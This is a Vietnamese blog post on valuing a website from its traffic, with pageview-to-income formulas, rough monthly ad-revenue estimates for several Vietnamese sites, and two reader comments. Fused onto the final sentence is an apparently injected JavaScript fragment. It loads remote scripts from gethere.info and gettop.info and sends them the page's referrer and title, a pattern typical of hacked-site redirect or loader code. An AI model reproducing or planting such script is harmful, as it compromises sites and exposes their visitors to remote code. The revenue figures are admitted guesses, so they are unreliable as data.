Cách định giá website bằng traffic

Định giá website là cách xác định giá trị của một website, nhờ vào đó bạn khai thác và tận dụng được tiềm năng của nó. Có nhiều công cụ để định giá website nhưng chưa chắc đã mang lại hiệu quả định giá chính xác

Cách định giá website bằng traffic

Sau một thời gian kiếm tiền trên mạng bằng việc xuất bản nội dung online cũng như tham gia cộng tác các chương trình xuất bản quảng cáo trực tuyến thu lợi nhuận. Mình có một thống kê rất hay và thú vị cho các bạn về chỉ số thu nhập của một số website tại Việt Nam. Chắc chắn là nó không chính xác nhưng lại phản ánh được phần nào doanh thu của họ.

Cách định giá website bằng traffic

Ở đây mình viết ra giúp các bạn thống kê ở dạng traffic thật đến trang web của mình, dựa vào đó các bạn định giá website của các bạn tìm ra được giá trị của bạn khi chuẩn bị ký kết một hợp đồng quảng cáo.

Theo thống kê một website có 100K page views sẽ đem lại thu nhập 60$ tương tương với 1.3tr đồng.
Tỷ giá $ hiện thời ngày 6/1/2014 = 21.075.000vnđ/$.

Công thức: 100.000 pageviews = 60$
Định giá website: Pageviews / 100.000 x 60 = (X) USD

Thống kê này được mình theo dõi trong suốt thời gian đặt quảng cáo trực tuyến trong 6 tháng, chưa kể thêm các vị trí quảng cáo đã được mình tối ưu nhằm nâng cao tỷ lệ click để đạt hiệu quả. Nhưng chưa phải là tối ưu đến mức toàn bộ.
.
Thu nhập của một số website thú vị như sau, dựa trên ước tính gần đúng doanh thu quảng cáo. Ngoài ra doanh thu tiêu thụ sản phẩm cung cấp là không thể ước tính được. Còn việc bạn muốn tìm hiểu doanh thu của họ như thế nào hãy liên hệ với bộ công thương hoặc trưởng phòng tài vụ của các website để biết thông tin chi tiết.


 • Vnexpress.net ~200.000.000 = 120.000$ = 2.520.000.000 vnđ/tháng
 • 24h.com.vn ~ Vnexpress.net 2.52 tỷ VND/tháng
 • Zing.vn ~250.000.000 ~ khoảng 3 tỷ /tháng
 • Kenh14.vn ~40.000.000 = 50.000$ = 1.1 tỷ vnđ/tháng
 • Haivl.com ~40.000.000 = 50.000$ = 1.1 tỷ vnđ/tháng + haivl.tv ~10.000.000 = 12.000$ = 252.000.000vnđ tổng haivl = 1.352.000.000
 • Nhaccuatui.com ~ haivl.com ~ 1 tỷ 3
 • Sinhvienit.net ~ 12.000.000 = 10.000$ = 200.000.000 vnđ/tháng

Trên thực tế thu nhập của các website trên còn cao hơn con số đó rất nhiều, hiện còn đang là một bí ẩn. Việc này ở Việt Nam chưa được công bố, nhưng các trang web nước ngoài sau khi đóng thuế thì đã có nguồn thông tin chính xác về nhiều trang web, trang blog có thu nhập khủng khiến nhiều người mơ ước.

Nhiều khi các bạn cũng băn khoăn xem cái website của mình trị giá như thế nào. Mất công gây dựng nó lên rồi cũng phải thu về được lợi nhuận chứ. Trước khi định bán một khoảng trống trên website của mình để thu lợi nhuận cũng cần phải cân nhắc giá trị của khoảng trống ấy là bao nhiêu và bán với giá chắc chắn sẽ đem lại lợi nhuận cao hơn những quảng cáo cũ bạn mới bán. Định giá website ở Việt Nam là khái niệm cũng đã cũ rồi nhưng thực tế nó lại không được sử dụng rộng rãi.

Thêm vào đó sự méo mó của các thước đo giá trị website càng làm cho những đánh giá trở nên méo mó hơn. Ở đây tôi muốn cung cấp đến cho các bạn cách tính cơ bản để lượng giá website của mình một cách đúng đắn và có giá trị tại Việt Nam. Còn website tiếng anh bạn vui lòng tính theo công thức sau.

Công thức: 100.000 pageviews = 1200$
Định giá website: Pageviews / 100.000 x 1200 = (X) USD

Giá trị của một website tiếng anh cao gấp 20 lần website tiếng việt. Hiện tượng webmaster Việt Nam làm site tiếng anh để kiếm tiền trên mạng không phải ít. Mỏ tiền nào lớn thì ta khai thác đó là điều đương nhiên. Và thực tế tài chính và ngành quảng cáo Việt Nam còn nhiều điều đáng nói trong tương lai.

Còn bạn đã tính được doanh thu của mình chưa?

Nếu website của bạn có giá trị từ 3 triệu đồng / tháng hãy bắt đầu tham gia các mạng xuất bản quảng cáo trực tuyến và kiếm tiền với họ. Còn nếu như bạn chưa đạt được con số ấy vui lòng tiếp tục phát triển nội dung và chất lượng website.

Chúc các bạn kiếm được nhiều tiền, quan trọng hơn kiếm được những đồng tiền xứng đáng với công sức mình bỏ ra!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Pin It

2 thoughts on “Cách định giá website bằng traffic

 1. Bài viết quá chủ quan, trafic sẽ không thể đánh giá được, vì nó còn dựa vào nội dung nữa, mang tính chất áp đặt cho 1 VD cụ thể

  • Bạn nói chính xác, chỉ là một ví dụ vui để mọi người tự đánh giá thôi. Dựa trên kinh nghiệm chủ quan của mình nhưng một vài người họ không biết tận dụng giá trị của website mình chứ. Chỉ là tương đối một cách khách quan cho các trang web.
   Một ví dụ khá hay:
   Một trang web nội dung du lịch ở Việt Nam CPC = 0.02$ ~ 0.03$
   Một trang web nội dung về SEO Việt Nam: CPC 0.06 ~ 0.1$
   Gọi là tính trung bình nhất theo cái giá trung bình quảng cáo. Hoặc cũng chỉ là một thú vui cho ai đó rảnh rỗi ngồi định giá website của chính mình

Trả lời

Thư điện tử của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *